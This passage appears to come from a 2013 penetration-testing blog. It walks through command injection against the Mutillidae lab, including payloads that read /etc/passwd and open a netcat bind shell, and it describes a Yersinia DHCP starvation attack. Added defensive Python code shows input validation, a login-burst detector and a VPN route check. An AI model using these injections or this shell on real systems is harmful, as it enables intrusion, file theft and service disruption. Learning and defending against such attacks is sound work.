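            alerts.append(f"{ip}: {len(q)} failed logins within {window_s}s")
    return alerts


def _line(ip: str, second: int, status: int, path: str = LOGIN_PATH, method: str = "POST") -> str:
    """Build one constructed access-log line for the demo."""
    return (f'{ip} - - [09/Oct/2013:21:14:{second:02d} +0530] '
            f'"{method} {path} HTTP/1.1" {status} 1432 "-" "Mozilla/5.0"')


SAMPLE_LOG: List[str] = (
    [_line("172.19.17.5", s, 200) for s in range(12)]                 # Intruder run: 12 misses in 12 s
    + [_line("172.19.17.5", 12, 302)]                                 # ...then the hit
    + [_line("172.19.17.9", 20, 200), _line("172.19.17.9", 40, 302)]  # a human with one typo
    + [_line("172.19.17.9", 41, 200, "/home.php", "GET")]             # unrelated request, ignored
)

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Rate limiting or a lockout on the same counter stops the attack rather than just reporting it; the success-after-failures alert is the one to page on, because it means a password was actually found.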

Command Injection Attack Example [Screenshots] | Web Applications Hacking | Using Kali Linux

Written by Pranshu Bajpai | Google+ | LinkedIn

Read up on command injection here.

OWASP testing guide is your best friend while learning web applications hacking or penetration testing.

I tested the attack on two different vulnerable applications, one of which is 'Mutillidae'.


Command Injection Attack Example

Ideally, you are supposed to 'look up' DNS and resolve hostnames to IP addresses using this web application.

However, the code is vulnerable to 'command injection attack'.

As you know, in Bash we can execute two commands one after the other by typing:

#cmd1 && cmd2

Try this in the vulnerable application (the point is to get another command executed on the server):

www.facebook.com && ls /

In the vulnerable application first Facebook's IP address would be resolved on the server and then the second command would get executed, listing the contents of the 'root' directory.



Now that you know the command injection vulnerability exists, you can try different commands and construct an attack.

For example:

Display the contents of 'passwd' file

www.facebook.com && cat /etc/passwd

OR invoke netcat to listen for commands on port 8085 of the victim machine:

www.facebook.com && nc -l -p 8085 -e '/bin/bash'



See what we did here?

I assume netcat utility would be present on the server, so I tell it to listen on port 8085 (and invoke bash)

Now from our Terminal we can use our netcat client to connect to that server

#nc 172.X.X.X 8085

We are connected. We can now begin executing commands on the compromised remote machine.

#whoami



Note that we are a normal user--'www-data'--and not root. Hence, we have limited Privileges at this point.

However, using privileges of 'www-data' it is possible for us to deface the website. Note that defacing a website is unacceptable even as part of a penetration test, so do not go through with it.

To deface the website

#vi /var/www/index.html

It is now possible to edit this file to make changes and deface the website.

Note that you can terminate the first command simply by typing ';' and, hence, don't always need the first part, that is, 'www.facebook.com'. For example:

; cat /etc/passwd
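Added example, not from the original post: the DNS-lookup feature above as it is written when vulnerable and as it should be written. Mutillidae's own code is PHP; this Python pair is a stand-in that shows the same defect (the form field pasted into a shell command line, so `&&` and `;` become shell operators) and the fix (validate the input against a strict host-name pattern, then pass it as a single argv element with no shell involved). The vulnerable builder only returns the string it would hand to the shell; nothing is executed in the demo.

```python
import re
import shlex
import subprocess
from typing import List

# RFC 1123 host name: dot-separated labels of letters, digits and interior hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def vulnerable_command(host: str) -> str:
    """What the vulnerable page builds: the form field pasted straight into a shell
    command line (PHP shell_exec / Python os.system style). Returned, never run here."""
    return "nslookup " + host


def shell_tokens(command: str) -> List[str]:
    """How a shell would tokenize that string: injected '&&' / ';' survive as tokens."""
    return shlex.split(command)


def is_valid_hostname(host: str) -> bool:
    return HOSTNAME_RE.match(host) is not None


def safe_argv(host: str) -> List[str]:
    """Allow-list the input, then pass it as ONE argv element: no shell, no re-parsing."""
    if not is_valid_hostname(host):
        raise ValueError("rejected: not a host name")
    return ["nslookup", host]


def lookup(host: str, timeout: float = 5.0) -> str:
    """The hardened feature: argv list, shell=False (the default), bounded runtime."""
    result = subprocess.run(safe_argv(host), capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    for attempt in ("www.facebook.com", "www.facebook.com && ls /", "; cat /etc/passwd"):
        print(f"{attempt!r}: shell sees {shell_tokens(vulnerable_command(attempt))}, "
              f"validator accepts: {is_valid_hostname(attempt)}")
```

The allow-list is the important half: even with an argv list, a value beginning with `-` could be read as an option by the child program, and the pattern rules that out along with every shell metacharacter.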

Sunday, October 6, 2013

VPN Configuration / VPN Client in Kali Linux / Debian / Ubuntu / Backtrack | How to | Anonymous Internet | VPN Secure Connection

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

As a penetration tester, I have a variety of concerns while using the Internet:

1. Security: While I work as a penetration tester for remote clients, I like to make sure my "tunnel" to the internet is free from eavesdroppers and is reasonably secure. VPN tunneling takes care of that.

2. Anonymity: All of us need  privacy and anonymity for one reason or another. VPN servers allow that by 'not storing' logs of usage on their servers.

3. Over-blocking and "Internet-usage Policies": ISPs and local network administrators can get overzealous about restricting user activity on their networks (this is especially so for college and office networks). The network that I use takes pride in blocking categories like "file transfer" and "hacking". On several occasions, I have a legitimate need for visiting a hacking forum or a "file transfer" service, since most email providers don't allow 'attachments' to go over 25 - 30 MB.

(By the way, you can also use TOR for anonymity and unblocking websites. I have written about how to use TOR in Kali Linux here)

How to set up / configure VPN in Linux:

Step 1. Subscribe to a VPN Service. I have subscribed to AirVPN (around $9 a month)

Step 2. Login to the VPN service provider's website (AirVPN in my case) and locate 'Generate Configuration file'




Step 3. Download the .ovpn file

Additionally, a .proxyauth file will be provided if a proxy authentication is required in your local network proxy (see HTTP code 407)

Step 4. In Terminal type:

             #apt-get install openvpn
             #openvpn --version
             #openvpn --config <file_you_downloaded.ovpn>


This should bring the VPN tunnel up. Check the interfaces:

            #ifconfig



Notice the presence of a new interface 'tun0', along with its IP address (a private IP address provided by the VPN network).

Now remove any local proxy setting you might be using in your browsers or system and connect to the Internet through the VPN tunnel.
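Added example, not from the original post: a leak check to run once `openvpn --config` reports the tunnel is up, because the presence of tun0 alone does not prove your traffic uses it. It parses `ip route show` output (constructed samples below for before and after connecting), picks the route for an arbitrary Internet address by longest-prefix match, and reports whether that route leaves via tun0 while the VPN server itself is still reached through the physical interface, which is the shape of a correct tunnel (OpenVPN's redirect-gateway installs 0.0.0.0/1 and 128.0.0.0/1 rather than replacing the default route). Interface names and addresses are assumptions.

```python
import ipaddress
from typing import Dict, List, Optional

Route = Dict[str, str]


def parse_routes(ip_route_output: str) -> List[Route]:
    """Minimal parser for `ip route show` lines: destination plus via/dev/metric."""
    routes: List[Route] = []
    for line in ip_route_output.splitlines():
        toks = line.split()
        if not toks:
            continue
        route: Route = {"dst": "0.0.0.0/0" if toks[0] == "default" else toks[0]}
        for key in ("via", "dev", "metric"):
            if key in toks:
                route[key] = toks[toks.index(key) + 1]
        routes.append(route)
    return routes


def route_for(routes: List[Route], dst_ip: str) -> Optional[Route]:
    """Longest-prefix match, the way the kernel picks a route (metrics ignored here)."""
    ip = ipaddress.ip_address(dst_ip)
    best, best_len = None, -1
    for route in routes:
        net = ipaddress.ip_network(route["dst"], strict=False)
        if ip in net and net.prefixlen > best_len:
            best, best_len = route, net.prefixlen
    return best


def tunnel_ok(routes: List[Route], vpn_server_ip: str, tun_dev: str = "tun0",
              probe_ip: str = "8.8.8.8") -> bool:
    """True when ordinary traffic leaves via the tunnel while the VPN server itself
    is still reached through the physical interface (otherwise the tunnel would loop)."""
    general = route_for(routes, probe_ip)
    server = route_for(routes, vpn_server_ip)
    return (general is not None and general.get("dev") == tun_dev
            and server is not None and server.get("dev") != tun_dev)


# Constructed `ip route show` output before and after OpenVPN connects.
BEFORE_VPN = """\
default via 192.168.1.1 dev wlan0 proto static metric 600
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
"""
AFTER_VPN = """\
0.0.0.0/1 via 10.8.0.1 dev tun0
default via 192.168.1.1 dev wlan0 proto static metric 600
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.6
128.0.0.0/1 via 10.8.0.1 dev tun0
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.23 metric 600
203.0.113.10 via 192.168.1.1 dev wlan0
"""
VPN_SERVER = "203.0.113.10"  # assumption: the remote address from the .ovpn file

if __name__ == "__main__":
    print("before:", tunnel_ok(parse_routes(BEFORE_VPN), VPN_SERVER))
    print("after: ", tunnel_ok(parse_routes(AFTER_VPN), VPN_SERVER))
    try:
        import subprocess
        live = subprocess.run(["ip", "route", "show"], capture_output=True, text=True).stdout
        print("this host:", tunnel_ok(parse_routes(live), VPN_SERVER))
    except FileNotFoundError:
        print("no `ip` binary on this host; constructed samples only")
```

DNS is the other classic leak: if /etc/resolv.conf still points at the ISP resolver after the tunnel comes up, name lookups bypass the VPN even when the routes are right.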



How to Install New Cool / Hacker Fonts in Kali Linux / BackTrack / Debian

Written by: Pranshu | Find Pranshu on Google+ And LinkedIn

Are you looking to install new cool "HaX0r" fonts on your Linux distro?

My Advice: Don't

Reason: Most of the "hacker" fonts out there are illegible and not suitable for the long hours that you might be spending typing on Terminals as a penetration tester.

Here's how to install a new font in Linux:


Step 1: Download a .ttf font from the Internet. Google it, you will find many. As I have stressed before, avoid "cool hacker" fonts. Look for something comfortable to read.

Step 2.

        #gnome-font-viewer <font_location_on_drive>


(Notice the illegibility of the font)

Step 3. Install font




That's it. The new font will now show up in your 'Set Font' option in Terminal 'Preferences' or wherever you need to use it.

Given below are a couple of images of fonts that were too "Kewl" or "Elite" for me to use. I uninstalled them immediately.






Sunday, September 8, 2013

DHCP DOS Attack with Yersinia in Kali Linux / BackTrack | How To

Written by: Pranshu Bajpai | Find Pranshu on Google+ And LinkedIn

So there I was one fine evening, connecting to the internet, sending DHCP request packets to the local DHCP server for address allocation, when I noticed I wasn't getting any IP allocated to me. Some problem with the DHCP.


I 'pinged' the DHCP server thinking that it might be down for some reason. But it did send me a reply, so it was up. Then why wasn't it allocating an address to my computer?

Someone over the LAN had recently discovered Yersinia and proceeded to carry out a denial of service attack on our local DHCP. Not cool.

I decided to write up on Yersinia, since it makes a DOS attack on DHCP quite simple and easy with its GUI.

If you're using Kali Linux, type:

            #yersinia -G

This will bring up the GUI which looks like this:




A super-quick discussion of DHCP; this is what happens on the network:


  1. I got No IP - You power up your machine. It doesn't have an IP.
  2. DHCP DISCOVER: Where can I get an IP? - If configuration isn't set to static, your machine looks for active DHCP servers in vicinity to get Configuration Info.
  3. DHCP OFFER: I can give you an IP - The packets from your machines get to the local DHCP server and it sends DHCP offer to your machine.
  4. DHCP REQUEST: Great!! Tell me my IP - Your machine responds by requesting configuration.
  5. IP Allocation - DHCP Server selects an IP address from its 'pool' of free IPs and allocates it to your machine's MAC address.

So the concept is to send many DHCP discover packets to the local DHCP server, using a different spoofed MAC address each time. The DHCP server's free IP pool is quickly exhausted and a genuine DHCP request goes unsatisfied.

So here's how we send many DHCP discover packets through Yersinia:



In my Case, I noticed within seconds that '163903' packets were sent. This is a DOS attack on the DHCP server.




Finally, you can stop the attack by 'list all attacks' and then cancelling the active attack.



You can find a 'yersinia.log' file created in your 'home' directory after the attack.

Security Against this DHCP DOS Attack by Yersinia:

Use port security at the Switch: On a specific port on the switch only a limited amount of MAC addresses would be allowed. So MAC spoofing wouldn't work after a while.